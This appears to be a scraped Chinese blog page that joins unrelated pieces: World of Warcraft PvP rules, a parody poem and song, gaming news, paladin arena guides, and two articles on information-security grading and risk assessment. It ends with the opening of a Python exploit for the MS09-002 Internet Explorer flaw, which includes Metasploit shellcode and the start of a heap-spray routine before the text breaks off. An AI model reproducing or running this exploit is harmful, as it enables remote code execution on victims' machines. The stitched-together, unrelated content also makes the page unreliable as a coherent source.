Chinadu's Blog

本阵营玩家：
蓝名 -- 代表非pvp状态，任何玩家都无法主动攻击蓝字的玩家
绿名 -- pvp状态，对立阵营玩家可以随时攻击绿字的玩家

敌对阵营玩家：
红名 -- 敌对玩家，对方可以攻击你，你也可以攻击对方
黄名 -- 敌对玩家，但是你的pvp开关未开，你可以攻击对方，但是对方不能先攻击你，你攻击对方之后，对方名字变为红色，你的名字变为绿色

如何在蓝绿两种颜色的名字之间切换：

1.pvp服务器

进入中立地区和对方阵营地区，所有玩家强行转换为绿名，也就是说pvp开关强制打开
进入本阵营保护区（主城，1-10级区，10-20级区），5分钟之内要是没有任何pvp行为，名字自动从绿色转为蓝色

2.pve服务器

玩家默认为蓝名，无论在什么地区，只要没有pvp行为，永远为蓝名
输入命令/pvp，名字变为绿色，就是pvp开关打开，对立阵营的玩家就可以主动攻击你
再次输入命令/pvp，5分钟之内没有pvp动作，名字转变为蓝色
进入本阵营保护区，5分钟之内没有pvp动作，名字转变为蓝色

3.RP服务器

同pve服务器

4.RP-pvp服务器

同pvp服务器

才饮战神血 又杀小芊芊
意欲刷荣誉 无奈人已散
忽闻高声语 奥山英雄团
只要惩戒骑 装备亦自展

显我数十爆 抒我千余奶
左有天使盾 右持执政官
团长一声笑 如此怎可战
身无惩戒套 双手无野蛮
英雄惩戒团 拍人似板砖
血洗奥山谷 不见大气喘
尔乃神圣骑 如何并肩战
行无几余步 定被数人砍

洗我惩戒点 将我野蛮穿
战盔幽似海 日剑金光闪
再呼团长来 重新将我看
团长闻声至 将我细查观
野蛮整套穿 英雄亦定然
急急入奥山 速把将军斩

如今乱世道 切记此条款
战士甚低端 术士亦不堪
萨满菜一盘 猎人渣一般
奥法不够看 平衡靠边站
谁肯称英雄 唯有惩戒敢！

一个欧服玩家没有赶到黑曜石副本，欧服的一位GM用500%速度的摩托车带玩家一路狂飙进副本。在副本里变身为奥特曼，引来正在准备打BOSS团队人员的围观

转载自：多玩
3月10日晚间消息，针对日前关于网游《魔兽世界》资料片《巫妖王之怒》二审未获通过的报道，网易科技获悉，这一观点并不属实，此类消息也被九城官方予以否认。据可靠渠道透露，该游戏的审批被相关部门延长，但目前仍未否决审批该游戏。

　　据相关渠道获悉，前不久相关部门曾就《巫妖王之怒》召开过审批研讨会，当时并未否决这款游戏的审批。对方透露，《巫妖王之怒》之所以目前仍未拿到审批，原因有二：一是相关部门考虑到这款游戏在社会的影响力极大，因此在审批流程上比其他游戏更为严格；二是因为从《魔兽世界》到《燃烧的远征》曾被国内媒体曝光过大量负面新闻，在这种背景下，这款游戏的审查流程会有所延长。

　　“从陈晓薇的个人活动能力上看，我觉得他们拿到这款游戏的审批绝对不是问题，现在的问题是他们在什么时间点能够拿到审批。”据对方透露，《巫妖王之怒》审批未通过的说法并不恰当，只是目前仍然在走流程。该人士的观点与九城对此事的答复也十分相似。九城表示，最近几个月内一直在尽全力加速资料片的本土化工作。

　　另据了解，除相关部门将《巫妖王之怒》的审批进行延长外，九城在与暴雪的谈判中也出现严重分歧，暴雪至今仍未与九城续签《魔兽世界》。有传闻称暴雪曾提出与九城成立合资公司运营网游《魔兽世界》及其资料片，但九城断然拒绝了这一提议。与此同时，为解决盈利单纯依靠《魔兽世界》的问题，九城内部也决定自2009年开始加大与EA的合作力度，EA作为暴雪在全球范围内最大的竞争对手，目前持有九城16.32%的股份。此外，EA还将旗下网游《FIFA online2》交由九城代理，这是EA在中国大陆获批的第一款网游作品，九城已公开宣布将于今年4月进行公测。除这款游戏外，据接近EA的人士透露，EA还将最新网游力作《战锤online》交付九城代理，九城方面则为此支付了比《FIFA online2》更高的代理费用。

　　值得注意的是，2009年3月10日下午，暴雪北美官网曾撤出简体中文连接，尽管暴雪随后修复了错误。但外界仍然猜测这一消息证明暴雪与九城关系恶化。在这敏感时刻九城立改以往对传言不予评论的态度，并即刻发表声明称该错误只是简单的技术问题造成。

　　分析人士认为，目前暴雪与九城的关键进入自合作以来最为敏感的时刻。九城的这些举动一方面是解决营收比例中非《魔兽世界》的游戏贡献，另一方面也是在与暴雪的谈判陷入僵局后为自己增加谈判筹码。（方堃）

《胸部平平》

作词：螃蟹
演唱：真亦轩
旋律：SHE的《不想长大》

今天天气很好妈妈带我去买新衣
可是试了很多件她一直都不满意
她和旁边几个妇女一起探讨原因
结果一致认为我的胸部实在太平
她们拉了一个女生来让我看齐
她的胸部波涛汹涌很有震撼力
她正面 她侧面 她立正 她稍息
我想立即挖个地洞马上就钻进去

我的胸 我的胸 它很平
就像是 小笼包 被碾平
怪爸爸 怪妈妈 的基因
就这么 就这么 的决定
我的胸 我的胸 它很平
其实也 没什么 的关系
看梁静茹 还有孙燕姿
不也平的很美丽
（不也是 平的很美丽）

看满街丰胸的广告和糟糕的海报
听说许多女孩竟真的为丰胸开刀
老实说胸部要那么大到底做什么
难道你还要和奶牛去比赛大小
虽然说胸小偶尔穿衣是缺少味道
但也有很多可爱衣服胸大的穿不了
如果说是你男朋友会计较胸大小
那样的男人脑袋进水甩掉就算了

我的胸 我的胸 它很平
又能有 什么样 的关系
不用烦 下垂和 占便宜
还能省 一笔钱 买内衣
我的胸 我的胸 它很平
就算像 小笼包 被碾平
也不会影响 我的美丽
美丽靠 聪明和自信

平胸MM和我一起唱
一起歌唱快乐美好

我的胸 我的胸 它很平
又能有 什么样 的关系
不用烦 下垂和 占便宜
还能省 一笔钱 买内衣
我的胸 我的胸 它很平
就算像 小笼包 被碾平
也不会影响 我的美丽
美丽靠 聪明和自信

惩戒+戒律牧22 80场冲肩膀心得与体会 附一些重要的PVP插件 更新一些实用的PVP宏 相信你也能拿肩膀和武器
本人TBC首先玩了一年防护然后玩了3个月奶 大概去年9月份听说惩戒3.0有质的改变才开始接触TBC的惩戒的 以前拿AL是玩了很久清算不过
本人操作实在是很一般 实在因为惩戒3.0确实很强 而且这组合实在太好冲了 连我这种半路出家的都能拿到 所以推荐给各位没拿肩膀的QS同学 我和MS从1850开始一共打了2个星期80多盘65胜只20负 废话到此切入正题吧
首先是我的装备4S4 S2肩膀
戒指海山加护卫者
饰品战斗大师加耻辱碎片
护卫者齐
武器是灾变
相信想冲肩膀武器的QS都和我装备差不多

[::艾泽拉斯国家地理 BBS.NGACN.CC::]

正文的分割线

然后是天赋 我的天赋是0/10/51
[ http://wow.178.com/tf/sq.html?sZ0ebZVfMtrf0fMsgzuo ]
以下是我对各天赋评注
防护 10
神圣之力5/5
15%力量 对所有技能伤害的加成都很大 本来提升就非常之大 何况配合惩戒的AP转法伤 没有不点满的道理
淡泊3/3
首先是减少昏迷时间百分之30 因为PVP时有时候你不可能总有自由来解你自己的昏迷效果 比如给了MS 解MS肾击和减速 昏迷了交徽章又不太值得很容易吃控制 所以当你点了这天赋被晕了而自由CD的时候不解都没多大关系 这样贼来砍你必定更头疼
然后是抗驱散 配合2点神圣圣印 加上身上的BUFF(战争艺术 力量祝福 耐 正义之怒 十字军的命令 回蓝BUFF) 首先绝对是压制FS的极品天赋 如果FS还能偷到你自由那他可以去买彩票了 然后遇到贼牧 法牧 战牧 无敌抵抗一次群体驱散 有时就是输和赢之间的差别 PVP没有不加的道理 记住你来JJC是来PVP而不是要你砍木桩
守护者的宠爱 2/2
3分钟保护 持续14秒的自由
首先3分钟的保护遇到DPS加奶的组合绝对是VIP的 一次战斗甚至能用两次 当MS被菜刀贴住时能不能及时丢出保护就是成败的关键
然后是14秒的自由 配合淡薄 神圣圣印绝对是压制奥法的利器 让你不用为3 4个清洁解不了奥法的减速而头疼 而能更多时间贴近奥法制造伤害 或许多4秒就能多打两下
再是惩戒天赋
第一层祈福和偏斜各看各的爱好 其实差不多1是偏斜实用面只对菜刀才有效 2是要菜刀打你才有效 3是他要捅你脸才有效
祈福的话目前QS蓝真的很能耗 还没出现什么空蓝的情况 除开给保护或者控制对方DPS后给MS刷两口
强化审判 2/2
QS目前最主要的攻击手段 无视护甲的高伤害还带回蓝 没有不点满的道理
十字军之心 强化力量祝福 这两个天赋QS差不多 看你要3爆还是一爆90AP 差别很小 加起来点满3点就对了
辩护 2/2
降低目标所有属性20%
全属性降低20%，逆王者祝福*2 降低对方血 暴击 蓝 而且还不少 而且很容易保持
定罪 5/5
物理和法术爆击率提高5%
必须点满否则点不出复仇
以眼还眼 2/2
这天赋的坏处就是容易破忏悔 好处就是提供的伤害实在是太可观了 以眼还眼甚至对韧性减免的那部分还有效 也就是说对方没爆你 同样也可能反弹伤害
而且这伤害还能暴击 受各种BUFF天赋加成如复仇如征讨如双手武器专精等 也就是FS火球爆你4000多你能反他差不多2000运气好的话 但是破忏悔也就是当对方FS目标是你看到他丢出技能再丢忏悔 带贼的队伍倒无所谓因为贼基本上都在打MS 当他打你时也无所谓以眼还眼配合惩罚光环配合QS的攻击我想他血下得应该比你快多了
正义追击2/2
移动骑乘速度提高15%，降低缴械持续时间50%
对于腿短的QS没有不点的到底 何况还减缴械时间
征伐3/3
百分之6总伤害提高 划算
神圣圣印2/3
物理和法术爆击率提高2%，同时降低圣印被驱散的几率66% 配合淡泊 命令抗驱散百分之96 甚至保护你其他重要BUFF 因为如果点满的话FS的法术偷取是有判定的 如果一个BUFF百分之百抗驱散当QS身上有其他BUFF时他是不会优先偷取这个BUFF的 只点两点的话 FS想偷掉你自由很难很难 什么你说怕命令被驱散掉？就算只一个命令要驱散掉都只百分之4概率 当身上有3 4个BUFF时 如果你说你命令被驱散了。 你可以去买彩票了
双手武器专精 0
虽然有人测试过这个天赋好像是提升所有的伤害 但这天赋毕竟≤征讨 天赋太紧张了所以不点
圣洁惩戒 0
有人说百分之3的伤害很吸引人但我告诉你惩罚光环实用性实在太小了 这天赋只对付DZ加奶或者战士QS加奶的组合才有点实用价值 只要遇到FS SS我都是开的火抗 冰法冰抗 70法术抗性提供的法术免伤远比这百分之3的伤害来的划算
神圣意志 2/2
降低你被法术和远程攻击命中的几率 4% ，使自由之手能够解除昏迷效果
30S 超级短CD解昏迷 甚至可以解队友的昏迷效果 所有的盗贼都对这天赋很头疼 还附带百分之4法术未击中 抵抗个恐惧 心灵尖啸 火球 奥术弹幕什么的就赚大了
复仇 3/3
当你的武器，技能或者法术对敌人造成致命一击后，提升你的物理和神圣伤害3%，持续30秒，可叠加3层。
百分之9伤害提升本来就很可观了 还抗驱散 而且冒白光
战争艺术 2/2
提高十字军打击，神圣风暴，审判的伤害10%，如果上述技能造成致命一击效果，使你的下一个圣光闪现瞬发
点满没得说了 抽空给被急火的   MS瞬闪几下 配合牺牲保护自由 往往能救MS的命
忏悔 1/1
QS为数不多的控制技能 怎么能不点 22往往就是打出一轮轮强控来击杀对方的
狂热 5/5
使你的审判的爆击几率提高25%
在这个靠审判打人的年代没有不点满道理 而且无视护甲 而且还能出战争艺术效果 而且打法系近身机会不多 那么审判更尤为重要了 有人说我有制裁 制裁后必爆不需要点满这天赋所以 我想说的首先是制裁1分钟CD 最多让你一分钟内审判到一次被制裁的人 而你一分钟内能打出多少个审判？ 而且现在PVP真的很难晕住人了 而且很多时候制裁都留着控制对方治疗
圣洁怒火 2/2
使你的愤怒之锤的爆击几率提高50%，缩短复仇之怒的冷却时间60秒。
QS版斩杀 配合自身装备加十字军之心基本必爆了
睿智审判3/3
圣光出鞘3/3两个让QS3.0有质的改变的天赋不加没道理
正义复仇 1/5
使你的审判和神圣风暴造成暴击后，产生一个DOT，数值相当于该次伤害的8%。
这个天赋增加的总伤害还算可观 但PVP的话讲的是抓住机会秒掉其中一

3.0以后惩戒+牧师组合在22里显得异常强大.我和我队友1周打到了2200+.现在2300遇到DZ+治疗队有些困难.在这写些心得,给大家分享.在等待WLK的这段时间里,希望有更多的74拿上肩膀!

　　下面就具体说下应该22各主流组合的打法.

　　惩戒+奥法:首先,对方是双dps爆发队,开始,MS给我好盾,导言和恢复,我上去砍对方惩戒,如果对方打我,那么在我打惩戒的同时,尽量饶FS视线,瞬闪给自己很重要哦,在双驱散的情况下,MS+好你血,忏悔给对方FS,另外千万小心他开奥强+气定火球,很伤的.对方74先出无敌以后,基本分胜负了.如果对方打MS,不要忧郁,早给保护,完了牺牲,忏悔对方FS,MS饶好柱子,被制裁了及时给自由,还是打对方74,瞬闪给MS,一般保护,牺牲,痛苦压制以后,对方74已经开无敌了,这时候视情况适当给ms+几口.总之打MS很危险的,不过及时用好保护,牺牲还是能应付的..大概75%胜率.

　　双奥法:

　　还是MS给了恢复,盾以后再出去.看一个FS压,焦点另一个FS.尽量都不要在空地上去追FS,这样MS被羊,双FS打你很危险的.有柱子,能饶下是很好的.对方打我的话,在进攻FS的同时别忘了解MS羊.情况危险直接开无敌,FS要是消失了的话,就看下一波了.如果奥强,气定用了的话,第2波只要解好羊基本不会死人的.要是第一波奥强等大技能都没用,我们基本是输了.记得看哪个FS冰箱过了,就优先压那个FS,毕竟奥法还是很脆的.要是打MS,自由,牺牲就要给好了,第1个9秒羊要是MS来不及解直接徽章.之后制裁,忏悔,奥术洪流对方FS,瞬闪给MS.总之打这个组合,我们很容易被秒.遇到个队基本都吃我们,但是换其他双奥法队还是有不俗胜算,总的来说差不多65%胜率吧.

　　贼法:

　　这个组合毁伤贼的话,很容易秒我们.开场牺牲给MS,然后找机会贴近对方FS.万一牺牲没了,我还是被闷到的话,看情况确定是否徽章,MS被肾直接给自由,50%血给保护晚了,感觉应该更早一些,我贴贼打.制裁贼,忏悔FS.只要能把贼打跑,基本上我们赢了.对于他们打我的话,基本没什么胜算,除非操作上出现重大失误.还是忏悔FS,制裁留给贼,打贼的思路.基本胜算在90%.

　　贼+治疗队:

　　特别是贼牧,在对方无重大失误的情况下,基本吃我们.我们唯一的方法就是我打贼,MS躲对方MS视线,把贼往治疗盲区带.开始情况危险直接徽章解闷,盲的话如果你的牺牲没有解到的话,就直接无敌吧.毁伤在一个MS帮忙驱散的情况下打一个无帮助的节律M不超过10秒,所以我们怎样把对方MS由进攻转成治疗很关键.不停给MS自由,驱散DZ毒.这样也只能是期待对方出重大的失误,不然组合克制,基本上无解的.本人2200+打了20+场的贼带治疗队,只赢过寥寥几场.胜率不足10%.

　　惩戒+DZ:

　　毫无疑问,肾或者制裁给谁,就给谁自由,另外,打MS的话早点给保护,牺牲.我打DZ,对方很快会从进攻转防守.打这个组合基本没输过,胜率90%+.

　　奥法+牧师:

　　简单的组合.叫MS跟我一起跑,追对方FS.双驱散好.有机会MS烧下对方MS蓝,焦点对方MS,看好不要让他喝水就行了.奥法在单dps被压的情况下的爆发不足以杀死74和戒律M,打消耗战吧,他们会比你们先空蓝的.胜率95%+.

　　深痛苦SS+治疗:

　　开暗抗光环出去吧.出来直接秒SS的狗.招狗我们就继续杀,招胖子的话就54吧.然后无脑砍SS,瞬闪千万利用好.鬼魅缠身和痛苦无偿不要解,顶着大量的debuff砍SS吧.关键是细节问题上,不能出太大的失误.在被恐惧的时候千万小心,不要被秒了,我们就死不了.必要的时候给自己或者MS刷几口血是很重要的.优势一点一点积累的.在惩戒高伤害下,配合高治疗能力,对方比我们先倒.胜率80%+

　　战德:

　　老牌强力组合了.出门砍ZS吧,MS先别让ZS拦截到,如果ZS过来就直接杀MS的话看情况给MS自由,一般小德没多久就要出来的.建议先小控制一轮德.第一时间忏悔掉,然后继续打ZS,徽章解了的话MS接个恐惧.小德交了徽章之后,如果杀不掉ZS,就制裁然后杀一轮德,我们的控制技能多给小德,打这个组合要多切换目标,不要想着盯上给就一定要把谁杀死,树德我们是完全耗不过的,ZS打我,MS就找机会抽小德蓝,打MS的话就给好MS自由,尽量找机会控制小德把ZS带到治疗盲区杀了.由于切换目标打的缘故,小德必须换目标随时保持3花,这样消耗相对大些.制裁的控制性爆发一定要用在他们位置最差的人身上,即使一波打不死,那么也可以给你们积累相当的优势.总之,高端的战德实力不容忽视的.但是现在战德被太多组合吃,2200以上基本没见过.胜率90%+,估计遇不到高水平队吧.

　　惩戒带SM,小德:

　　惩戒+奶,毫无疑问,不可能一轮把对方打死.切换目标频繁进行紧密的输出是关键.戒律MS的强大进攻能力就要在这里体现了!抽蓝,驱散是积累为胜利的关键.另说一点,打惩戒+德的话,进攻形式可参照战德,感觉难度比战德要低.打惩戒+SM的话,尽量打对方的74吧.SM你越打他蓝越多.另外在必要时候打SM的话,PS一下,山寨旋风打SM的话,打不到TT,但是目标是TT的话,能打到附近的SM哦`胜率60%.

　　最后到内战了:

　　惩戒+MS:

　　同样地需要多次切换目标进行压制,队友找机会抽对方MS蓝是关键.忏悔74,马上制裁MS,然后我们MS抽对方MS蓝,我打对方MS,是最好的情况.如果感觉被对方砍身后,那可以换成打74.总之,能够长时间打到对方(打不到就换目标),抽蓝,瞬闪是关键,另外PS:翅膀别忘了用哦~

　　最后按照国际惯例:本人8区15组,索菲亚的救赎.队友MS:圣魔银月,索菲亚稻草人.

　　希望大家看了以后对此有所帮助,S4肩膀的SQ,MS越来越多!!

近年来，随着我国信息化发展的逐步深入，我们对信息系统的依赖越来越强，国家信息基础设施和重要信息系统能否安全正常地运行直接关系到国家安全和社会秩序。但是大型信息系统的安全保障体系建设是一个极为复杂的工作，为大型组织设计一套完整和有效的安全体系一直是个世界性的难题。一些行业性机构或大型企业的信息系统应用众多、结构复杂、覆盖地域广阔、涉及的行政部门和人员众多；系统面临着各种性质的安全威胁，间谍、黑客、病毒蠕虫、木后门、非法的合作伙伴、本地维护的第三方、内部员工等；安全保障要求的内容极为广泛，从物理安全、网络安全、系统安全、应用安全一直到安全管理、安全组织建设等等，凡是涉及到影响正常运行的和业务连续性的都可以认为是信息安全问题；不同业务系统、不同发展阶段、不同地域和行政隶属层次的安全要求属性和强度存在较大差异性。

国内的政策及发展

面对严峻的形势和严重的问题，如何解决大型信息系统的信息安全问题，是摆在我国信息化建设人员面前的重大关键问题。美国及西方发达国家为了抵御信息网络的脆弱性和安全威胁，制定了一系列强化信息网络安全建设的政策和标准，其中一个很重要思想就是按照安全保护强度划分不同的安全等级，以指导不同领域的信息安全工作。经过我国信息安全领域有关部门和专家学者的多年研究，在借鉴国外先进经验和结合我国国情的基础上，提出了分等级保护的策略来解决我国信息网络安全问题，即针对信息系统建设和使用单位，根据其单位的重要程度、信息系统承载业务的重要程度、信息内容的重要程度、系统遭到攻击破坏后造成的危害程度等安全需求以及安全成本等因素，依据国家规定的等级划分标准，设定其保护等级，自主进行信息系统安全建设和安全管理，提高安全保护的科学性、整体性、实用性。

2003 年，中央办公厅、国务院办公厅转发的《国家信息化领导小组关于加强信息安全保障工作的意见》(27号文)中，已将信息安全等级保护作为国家信息安全保障工作的重中之重，要求各级党委、人民政府认真组织贯彻落实。《意见》中明确指出，信息化发展的不同阶段和不同的信息系统，有着不同的安全需求，必须从实际出发，综合平衡安全成本和风险，优化信息安全资源的配置，确保重点。

之后，一系列的国家部委、行业组织下发了关于信息系统等级保护方面的政策和规范。2004年，公安部、国家保密局、国家密码管理委员会办公室、国务院信息化工作办公室联合下发了《关于信息安全等级保护工作的实施意见》（66 号文）。2005年国信办下发了《电子政务信息安全等级保护实施指南》（25号文）。2005年底，公安部下发了《关于开展信息系统安全等级保护基础调查工作的通知》（公信安[2005]1431号），并从2006年1月由全国各级公安机关组织开展了全国范围内各行业、企业信息系统的基础信息调研工作，并先后出台了《信息系统安全保护等级定级指南（试用稿）》、《信息系统安全等级保护基本要求（试用稿）》、《信息系统安全等级保护测评准则（送审稿）》、《信息系统安全等级保护实施指南（送审稿）》等指导性文件。

安全域划分的方法和步骤

对大型信息系统进行等级保护，不是对整个系统进行同一等级的保护，而是针对系统内部的不同业务区域进行不同等级的保护。因此，安全域划分是进行信息安全等级保护的首要步骤。

安全域是指同一系统内根据信息的性质、使用主体、安全目标和策略等元素的不同来划分的不同逻辑子网或网络，每一个逻辑区域有相同的安全保护需求，具有相同的安全访问控制和边界控制策略，区域间具有相互信任关系，而且相同的网络安全域共享同样的安全策略。当然，安全域的划分不能单纯从安全角度考虑，而是应该以业务角度为主，辅以安全角度，并充分参照现有网络结构和管理现状，才能以较小的代价完成安全域划分和网络梳理，而又能保障其安全性。以某单位信息系统总体信息系统安全域划分和单独一个业务区域内部安全域划分为例（参考例图1和例图2），对信息系统安全域（保护对象）的划分应主要考虑如下方面因素：

1.业务和功能特性

–业务系统逻辑和应用关联性

–业务系统对外连接：对外业务，支撑，内部管理

2.安全特性的要求

–安全要求相似性：可用性、保密性和完整性的要求

–威胁相似性：威胁来源、威胁方式和强度

–资产价值相近性：重要与非重要资产分离

3.参照现有状况

–现有网络结构的状况：现有网络结构、地域和机房等

–参照现有的管理部门职权划分



例图2：某业务安全区域内部安全域划分图

划分一个独立的业务信息系统的内部安全域的划分主要参考如下步骤：

1.查看网络上承载的业务系统的访问终端与业务主机的访问关系以及业务主机之间的访问关系，若业务主机之间没有任何访问关系的则单独考虑各业务系统安全域的划分，若业务主机之间有访问关系，则几个业务系统一起考虑安全域的划分；

2. 划分安全计算域：根据业务系统的业务功能实现机制、保护等级程度进行安全计算域的划分，一般分为核心处理域和访问域，其中数据库服务器等后台处理设备归入核心处理域，前台直接面对用户的应用服务器归入访问域；{参考：局域网访问域可以有多种类型，包括：开发区，测试区，数据共享区，数据交换区，第三方维护管理区，VPN接入区等；局域网的内部核心处理域包括：数据库，安全控制管理，后台维护区（网管工作区）等，核心处理域应具有隔离设备对该区域进行安全隔离，如防火墙，路由器（使用ACL），交换机（使用VLAN）等。}

3.划分安全用户域：根据业务系统的访问用户分类进行安全用户域的划分，访问同类数据的用户终端、需要进行相同级别保护划为一类安全用户域，一般分为管理用户域、内部用户域、外部用户域；

4.划分安全网络域：安全网络域是由连接具有相同安全等级的计算域和（或）用户域组成的网络域。网络域的安全等级的确定与网络所连接的安全用户域和（或）安全计算域的安全等级有关。一般同一网络内化分三种安全域：外部域、接入域、内部域。

安全保护级别的确定和等级管理

信息系统的安全保护可以理解为：为确保信息系统能够抗御来自人为的和自然的原因引起的威胁和破坏而采取的有效机制和措施。这些机制和措施包括技术和管理两方面的内容。信息系统安全等级保护所规定的五个安全保护等级，是实施安全等级保护的基础。计算机信息系统安全保护能力随着安全保护等级的增高，逐渐增强。安全域的等级和安全保护等级之间有一定的关系，主要体现在当安全域属于同一个网络时，安全域的保护等级随着这种等级的增高

出处:比特网

刚开始看到这个题目可能可能很多人都会产生不解，究竟这个风险评估过程中的“风险”指的是什么呢?是评估出来的风险结果还是评估过程中遇到的实施风险呢?所以首先我要解释一下下面到要谈的究竟是什么内容。
　　做信息安全的人都知道风险评估，而我在这里不谈那些技术评估、应用评估、流程评估等评估过程中的问题，只谈我们作为乙方在做咨询项目中通常都要做到的信息资产的风险评估，而这个风险评估过程中的“风险”也是指的在评估过程中遇到的实施风险。在下面的文章中我不谈如何做信息资产风险评估的方法，也不谈什么方法好，什么方法不好，因为风险评估工作各家有各家的做法，各人有个人的理解，不同的项目、不同的客户也存在不同的情况，所以针对具体情况选择合适的风险评估方法，化解在评估过程中可能遇到的问题和风险才是我这次要谈的内容。

1、风险评估的第一的误区

　　同一套方法，这在很多人看来是没什么奇怪的，我们在项目中做风险评估最关注的几个问题是，一方面，要尽量有效全面的评估出风险，并根据风险制定有效的控制，这是从评估的实用性和为客户带来效果的角度(即项目质量)来说的;另一方面我们还要保证项目的进度，常做评估的人都知道风险评估在资产识别阶段不能做的太细，避免做成CMDB，就是为了控制项目的进度。

　　每家公司或每个人可能都会有一套做信息资产风险评估的最佳放法论，这套方法论通常是多年实践积累、改进而来或从哪里直接借鉴过来的，而通常去给客户做风险的评估的时候也都是拿着这套所谓的最佳实践去做的(尤其是新手居多)。但这就忽略了一个问题，每个客户的实际情况是不同的，项目范围也是不同的，其信息资产的分布和管理方式、以及客户实际的配合力度以及客户是否需要通过认证的情况都是不一样的。在实际实施过程中可能会遇到，客户原本的资产管理就很混乱，缺少集中或统一了解和管理资产的人，人员对资产的熟悉情况太分散，评估的结果是否要与等保和安全域结合，客户是否有充分的人员和时间配合你工作等等情况。

　　因此如果不能够很好的根据客户选择评估的方法有时是会影响项目实施的。所以我们需要根据客户的具体情况适当调整我们评估的方法和实施方式，比如，我们是选择按部门划分评估，还是按资产分类评估，还是按系统分组来评估，资产分类的粒度要到什么程度。也就是说我们可能同时要掌握不只一套风险评估的操作方法，或者说同样的方法不能一成不变的应用到每个项目。当然如果大家不接受我的这个观点恐怕看接下来的内容也意义不大了。

2、前期沟通的重要性

　　这个问题关系到项目售前和项目经理之间的交流，以及最初项目计划的制定工作阶段。

　　我们都知道做风险评估的首要工作就是要明确风险评估的范围，即不能做小了(不全面，反应不了整体情况)，也不能做大了(做了不该做的，影响实施进度)。因此在项目洽谈的初期涉及到制定项目计划的时候就要考虑到这个问题了。首先应当与客户沟通清楚究竟哪些人员、部门或哪些公司要做评估，同时要更详细的了解或预估出在这个范围内可能个会涉及到多少的信息资产，大约需要多大的工作量和多少工时，然后再制定实施计划。千万不能只是初略的约定了哪个哪个部门或哪个哪个公司，就根据自己以往的经验制定计划了，不同客户的人员数量和资产范围那都是不一样的，切戒范经验主义错误。如果等到人员进场之后再去和客户确定这个问题，这时候一旦实际情况超出预计，你的实施计划已经制定好了，再去修改改就比较麻烦了。

　　所以前期的沟通交流一定要做的细致，千万不能马虎，售前与项目经理之间也要做好沟通和交流，尽量不要一味的为了打单子而忽略的后期实施过程中的风险。当然这个问题不单针对风险评估，所有与项目实施相关的工作在前期都应做好工作量的预估。

3、注意与其他标准的结合

　　有的时候在某些项目中我们做完信息资产的风险评估之后可能还要做等级保护实施、信息安全规划或安全域划分等工作，这时候在选择或制定风险评估方法就要注意与这些工作的对应或关联。以结合等级保护或安全域为例，通常这种情况我们使用以资产类别进行划分资产，按照一类资产进行风险评估的方法就不是很适用，因问它不能很好的反映出系统层面的重要性。这时我们可以考虑使用按系统进行资产分组，对系统资产组进行风险评估的方法，这样的操作也能为我们后期进行等级保护或安全域的划分提供帮助。

　　但在采用这种按系统评估的方法时需要注意一些问题。1、系统资产组价值与等保系统级别之间的对应关系，比如我们资产价值打分从1-5或1-3，那么如何对应到等级保护的1-4级别，可能就需要做一些映射关系。2、由于按系统评估评估的方法中对资产的识别粒度相对较细，因此切忌不要陷入CMDB的风险中，只要把系统相关的每个资产需要参与评估的信息识别出来就可以了，千万不要搞的太细了，把什么IP地址或系统间访问关系都搞出来了。(当然不是说这些东西没有用，如果后期做安全域划分还是有用的)但一定牢记根据项目的要求调整评估的方法，否则将影响项目进度。

4、分值与精确度的设计

　　对于分值和精确度的选择我想有经验的顾问都有自己的看法，我这里的建议主要希望为刚接触风险评估的人提供一些帮助。

　　现在主流的风险评估方法都会不同程度的使用数字打分的方式，有1-3的，也有1-5的，不管怎么打分其目的都是为了区分出资产价值的重要程度，明确资产风险的重要性，所以只要你的方法论合理，1-3还是1-5都没有什么区别，我认为都可以，只是1-3分级较粗可能更适合资产少、规模较小的客户，而1-5 分级较细，适合资产多、规模较大的客户。

　　当我们做完资产CIA打分和风险影响、概率打分之后通常都会使用公式计算出资产的价值或风险值，这里我要说明一点的就是对于这个计算出来的分值我们应当尽量保留1位小数(个人感觉保留2位用处不是很大)，由于资产数量众多时，保留整数的分值可能会出现许多同分的情况，为了便于我们后期的分析和整理工作，建议最好先保留1位小数这样重复的概率会降低很多，有利于我们对于资产和风险排序，也让结果变得更加精细。

5、客户规模与评估方法的选择

　　我们公司现在常用的风险评估方法主要有2种，一种是根据不同的部门，按资产分类进行识别，在资产类别层面进行风险评估;另一种是按系统或资产分组的方式划分，对资产组(或系统)进行分类识别，然后针对资产组(或系统)层面进行风险评估。这2种方法可以说是各有利弊。

　　通过在多个项目中分别使用这2种不同的评估方法，我个人感觉第一种方法操作起来相对简单，实施过程较快，而且客户易于掌握和理解，花费时间较短，但最后评估出来的结果实用性较差，需要进行更加细致的风险汇总、归纳和风险分析。第二种方法操作相对复杂，对顾

#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#
#   - Based on the code found by str0ke in the wild for MS09-002
#   - Tested using Internet Explorer 7.0.5730.11 on Windows XP SP2
#
#   Usage  : python ie_ms09002.py [port]
#       

import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class RequestHandler(BaseHTTPRequestHandler):

    def get_payload(self):
        # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub 
        # http://metasploit.com
        payload  = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f'
        payload += '\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b'
        payload += '\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51\x4f\x03\x5a\x47'
        payload += '\xe4\x36\x3a\x0f\x81\x33\x71\x97\xc3\x86\x71\x7a\x68\xc3\x7b\x03'
        payload += '\x6e\xc0\x5a\xfa\x54\x56\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68'
        payload += '\xe4\x0e\xfa\x85\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a'
        payload += '\x6b\xc1\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
        payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02\x3a\x66'
        payload += '\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e\x07\x7c\x69\xec'
        payload += '\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61\xd0\x62\x0c\x2c\xd4\x76'
        payload += '\x0a\x02\xb1\x0e';
        return self.convert_to_utf16(payload)
        
    def get_exploit(self):
        exploit = '''
    
        function spray_heap()
        {
            var payload = unescape("<PAYLOAD>");
                        
            var ret = 0x0c0c0c0c;
